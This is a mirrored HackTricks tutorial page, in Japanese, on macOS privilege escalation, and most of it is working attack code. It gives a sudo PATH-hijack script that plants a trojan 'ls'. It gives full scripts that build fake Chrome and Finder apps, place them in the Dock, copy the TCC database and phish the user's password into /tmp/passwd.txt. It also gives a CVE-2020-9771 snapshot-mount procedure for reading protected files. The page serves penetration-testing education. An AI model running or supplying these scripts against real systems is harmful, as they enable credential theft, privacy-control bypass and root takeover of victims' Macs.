mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
243 lines
9.9 KiB
Markdown
243 lines
9.9 KiB
Markdown
# macOS 特権昇格
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
## TCC 特権昇格
|
||
|
||
TCC 特権昇格を探している場合は、次に進んでください:
|
||
|
||
|
||
{{#ref}}
|
||
macos-security-protections/macos-tcc/
|
||
{{#endref}}
|
||
|
||
## Linux Privesc
|
||
|
||
**特権昇格に関するほとんどのトリックは、Linux/Unix に影響を与えるものは MacOS にも影響を与えることに注意してください。** したがって、次を参照してください:
|
||
|
||
|
||
{{#ref}}
|
||
../../linux-hardening/privilege-escalation/
|
||
{{#endref}}
|
||
|
||
## ユーザーインタラクション
|
||
|
||
### Sudo ハイジャック
|
||
|
||
元の [Sudo ハイジャック技術は Linux 特権昇格の投稿内にあります](../../linux-hardening/privilege-escalation/index.html#sudo-hijacking)。
|
||
|
||
しかし、macOS は **`sudo`** を実行する際にユーザーの **`PATH`** を **保持** します。つまり、この攻撃を達成する別の方法は、被害者が **sudo を実行する際に実行する他のバイナリをハイジャックする** ことです:
|
||
```bash
|
||
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
|
||
cat > /opt/homebrew/bin/ls <<EOF
|
||
#!/bin/bash
|
||
if [ "\$(id -u)" -eq 0 ]; then
|
||
whoami > /tmp/privesc
|
||
fi
|
||
/bin/ls "\$@"
|
||
EOF
|
||
chmod +x /opt/homebrew/bin/ls
|
||
|
||
# victim
|
||
sudo ls
|
||
```
|
||
ユーザーがターミナルを使用している場合、**Homebrewがインストールされている**可能性が非常に高いです。したがって、**`/opt/homebrew/bin`**内のバイナリをハイジャックすることが可能です。
|
||
|
||
### Dockのなりすまし
|
||
|
||
いくつかの**ソーシャルエンジニアリング**を使用して、Dock内で**Google Chromeのなりすまし**を行い、実際に自分のスクリプトを実行することができます:
|
||
|
||
{{#tabs}}
|
||
{{#tab name="Chrome Impersonation"}}
|
||
いくつかの提案:
|
||
|
||
- Dock内にChromeがあるか確認し、その場合はそのエントリを**削除**し、Dock配列の**同じ位置に****偽の**Chromeエントリを**追加**します。
|
||
```bash
|
||
#!/bin/sh
|
||
|
||
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
|
||
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';
|
||
|
||
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
|
||
|
||
# Create App structure
|
||
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
|
||
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
|
||
|
||
# Payload to execute
|
||
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
|
||
#include <stdio.h>
|
||
#include <stdlib.h>
|
||
#include <unistd.h>
|
||
|
||
int main() {
|
||
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
|
||
"sleep 2; "
|
||
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
|
||
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
|
||
"echo \$PASSWORD > /tmp/passwd.txt";
|
||
system(cmd);
|
||
return 0;
|
||
}
|
||
EOF
|
||
|
||
gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
|
||
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c
|
||
|
||
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
|
||
|
||
# Info.plist
|
||
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
||
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||
<plist version="1.0">
|
||
<dict>
|
||
<key>CFBundleExecutable</key>
|
||
<string>Google Chrome</string>
|
||
<key>CFBundleIdentifier</key>
|
||
<string>com.google.Chrome</string>
|
||
<key>CFBundleName</key>
|
||
<string>Google Chrome</string>
|
||
<key>CFBundleVersion</key>
|
||
<string>1.0</string>
|
||
<key>CFBundleShortVersionString</key>
|
||
<string>1.0</string>
|
||
<key>CFBundleInfoDictionaryVersion</key>
|
||
<string>6.0</string>
|
||
<key>CFBundlePackageType</key>
|
||
<string>APPL</string>
|
||
<key>CFBundleIconFile</key>
|
||
<string>app</string>
|
||
</dict>
|
||
</plist>
|
||
EOF
|
||
|
||
# Copy icon from Google Chrome
|
||
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
|
||
|
||
# Add to Dock
|
||
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
|
||
sleep 0.1
|
||
killall Dock
|
||
```
|
||
{{#endtab}}
|
||
|
||
{{#tab name="Finder Impersonation"}}
|
||
いくつかの提案:
|
||
|
||
- **DockからFinderを削除することはできない**ので、Dockに追加する場合は、偽のFinderを本物のすぐ隣に置くことができます。そのためには、**Dock配列の最初に偽のFinderエントリを追加する必要があります**。
|
||
- 別のオプションは、Dockに置かずにただ開くことで、「FinderがFinderを制御するように求めています」はそれほど奇妙ではありません。
|
||
- パスワードを尋ねることなく**rootに昇格する**別のオプションは、Finderに本当に特権アクションを実行するためのパスワードを要求させることです:
|
||
- Finderに**`/etc/pam.d`**に新しい**`sudo`**ファイルをコピーするように依頼します(パスワードを尋ねるプロンプトは「Finderがsudoをコピーしたい」と示します)。
|
||
- Finderに新しい**Authorization Plugin**をコピーするように依頼します(ファイル名を制御できるので、パスワードを尋ねるプロンプトは「FinderがFinder.bundleをコピーしたい」と示します)。
|
||
```bash
|
||
#!/bin/sh
|
||
|
||
# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
|
||
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';
|
||
|
||
rm -rf /tmp/Finder.app/ 2>/dev/null
|
||
|
||
# Create App structure
|
||
mkdir -p /tmp/Finder.app/Contents/MacOS
|
||
mkdir -p /tmp/Finder.app/Contents/Resources
|
||
|
||
# Payload to execute
|
||
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
|
||
#include <stdio.h>
|
||
#include <stdlib.h>
|
||
#include <unistd.h>
|
||
|
||
int main() {
|
||
char *cmd = "open /System/Library/CoreServices/Finder.app & "
|
||
"sleep 2; "
|
||
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
|
||
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
|
||
"echo \$PASSWORD > /tmp/passwd.txt";
|
||
system(cmd);
|
||
return 0;
|
||
}
|
||
EOF
|
||
|
||
gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
|
||
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c
|
||
|
||
chmod +x /tmp/Finder.app/Contents/MacOS/Finder
|
||
|
||
# Info.plist
|
||
cat << EOF > /tmp/Finder.app/Contents/Info.plist
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
||
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||
<plist version="1.0">
|
||
<dict>
|
||
<key>CFBundleExecutable</key>
|
||
<string>Finder</string>
|
||
<key>CFBundleIdentifier</key>
|
||
<string>com.apple.finder</string>
|
||
<key>CFBundleName</key>
|
||
<string>Finder</string>
|
||
<key>CFBundleVersion</key>
|
||
<string>1.0</string>
|
||
<key>CFBundleShortVersionString</key>
|
||
<string>1.0</string>
|
||
<key>CFBundleInfoDictionaryVersion</key>
|
||
<string>6.0</string>
|
||
<key>CFBundlePackageType</key>
|
||
<string>APPL</string>
|
||
<key>CFBundleIconFile</key>
|
||
<string>app</string>
|
||
</dict>
|
||
</plist>
|
||
EOF
|
||
|
||
# Copy icon from Finder
|
||
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns
|
||
|
||
# Add to Dock
|
||
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
|
||
sleep 0.1
|
||
killall Dock
|
||
```
|
||
{{#endtab}}
|
||
{{#endtabs}}
|
||
|
||
## TCC - ルート特権昇格
|
||
|
||
### CVE-2020-9771 - mount_apfs TCC バイパスと特権昇格
|
||
|
||
**任意のユーザー**(特権のないユーザーも含む)がタイムマシンのスナップショットを作成し、マウントして、そのスナップショットの**すべてのファイルにアクセス**できます。\
|
||
必要な**特権**は、使用するアプリケーション(`Terminal`など)が**フルディスクアクセス**(FDA)アクセス(`kTCCServiceSystemPolicyAllfiles`)を持つことであり、これは管理者によって付与される必要があります。
|
||
```bash
|
||
# Create snapshot
|
||
tmutil localsnapshot
|
||
|
||
# List snapshots
|
||
tmutil listlocalsnapshots /
|
||
Snapshots for disk /:
|
||
com.apple.TimeMachine.2023-05-29-001751.local
|
||
|
||
# Generate folder to mount it
|
||
cd /tmp # I didn it from this folder
|
||
mkdir /tmp/snap
|
||
|
||
# Mount it, "noowners" will mount the folder so the current user can access everything
|
||
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
|
||
|
||
# Access it
|
||
ls /tmp/snap/Users/admin_user # This will work
|
||
```
|
||
より詳細な説明は[**元のレポートで見つけることができます**](https://theevilbit.github.io/posts/cve_2020_9771/)**。**
|
||
|
||
## 機密情報
|
||
|
||
これは特権を昇格させるのに役立ちます:
|
||
|
||
|
||
{{#ref}}
|
||
macos-files-folders-and-binaries/macos-sensitive-locations.md
|
||
{{#endref}}
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|